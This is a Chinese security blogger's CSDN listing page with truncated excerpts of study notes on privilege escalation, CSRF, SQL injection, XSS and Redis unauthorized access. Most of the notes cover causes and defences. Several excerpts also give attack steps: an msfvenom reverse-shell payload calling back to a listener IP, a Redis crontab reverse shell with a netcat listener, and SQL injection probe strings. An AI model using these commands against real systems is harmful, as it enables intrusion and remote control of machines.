![](https://img-blog.csdnimg.cn/20201014180756919.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
网安
kimojinmmp
这个作者很懒,什么都没留下…
展开
-
【我的收集】
1.Windows命令 2.安全加固 3.windows系统排查 4.linux系统排查 5.linux日志 6.webshell特征 7.FastJson反序列化 8.分析,研判 9.Shiro 550 反序列化 10.Log4j 11.挖矿木马查杀 12.shiro权限绕过 12.沙箱逃逸 1. Windows 日志:C:\Windows\System32\winevt\Logs 命令:Eventvwr.msc 2.安全加固 (1)禁用或者删除无用的账号,检查特殊账户(可远程登录、用户权限高的账号),必原创 2022-05-21 21:52:06 · 899 阅读 · 1 评论 -
烂土豆+令牌窃取提权
烂土豆+令牌窃取提权(win2008及之前可以直接使用令牌窃取提权) potato.exe:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-075/potato.exe # 1.生成shell上传到目标主机 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.106.150 LPORT=4433 -f exe -o 4433.exe # 2.开启msf u原创 2022-04-03 19:58:25 · 200 阅读 · 0 评论 -
Csrf攻击
1.Csrf原理: 1.对目标网站增删改的地方进行标记,并观察其逻辑,判断请求是否可以被伪造,比如修改管理员账号时,并不需要验证旧密码,导致请求容易被伪造;v比如对于敏感信息的修改并没有使用安全的token验证,导致请求容易被伪造。 2.确认凭证的有效期(这个问题会提高CSRF利用的概率) 3.虽然退出或者关闭了浏览器,但cookie仍然有效,或者session并没有及时过期,导致CSRF攻击变的简单 2.防御CSRF攻击: 验证token:form 的最后加上 验证HTTP请求的Referer, 还有验原创 2022-04-03 13:32:07 · 183 阅读 · 0 评论 -
sql注入
1.注入攻击原理是什么?如何找注入点?如何判断注入点? 原理:通过构建特殊输入作为参数传入web应用程序,通过执行注入的sql 语句来达到获取sql权限的目的。 注入点:一切与数据库产生交互的操作都可能是注入点。 判断注入点: 1.搜索框或URL尾端加’如果报错则可能存在sql注入漏洞 2.数字型判断是否有注入 and 1=1//返回正确页面 and 1=2//返回错误页面 3.字符型判断是否有注入 and ‘1’='1//返回正确页面 and '1='2//返回错误页面 2.注入分为几类及提交方式是什么原创 2022-04-03 13:39:30 · 1925 阅读 · 0 评论 -
XSS漏洞
1.反射型漏洞产生原因和攻击方式: 原因:对用户的输入不经过滤直接回显到页面中。 方式:通过构造url,当用户访问该url时会重定向到钓鱼网站,或者窃取用户的cookie、发送其他请求。 2.Xss防御: 1)HTML转义,转义后可以确保用户输入的内容在浏览器中作为文本显示,而不是作为代码解析。htmlspecialchars()是PHP里面把预定义的字符转换为HTML实体的函数 2)验证用户输入,过滤特殊标签和指定字符。 3)输入做过滤,输出做转义 3.过滤绕过的思路 前端限制绕过,直接抓包重放,或者修改原创 2022-04-03 13:41:05 · 1575 阅读 · 0 评论 -
redis未授权访问
1.漏洞成因 Redis没有设置密码 Redis protected-mode 设置为no Redis以高权限启动 2.漏洞防御 限制redis访问:修改redis.conf文件 bind 127.0.0.1 修改默认端口:修改redis.conf文件 增加redis访问密码 3.漏洞利用 1.反弹shell 利用条件:以root权限运行时,通过写crontab来执行命令,反弹shell 1.开启任意监听端口:nc -nvlp 9999 2.set xxx “\n\n*/1 * * * * /bin/b原创 2022-04-03 13:44:32 · 2182 阅读 · 0 评论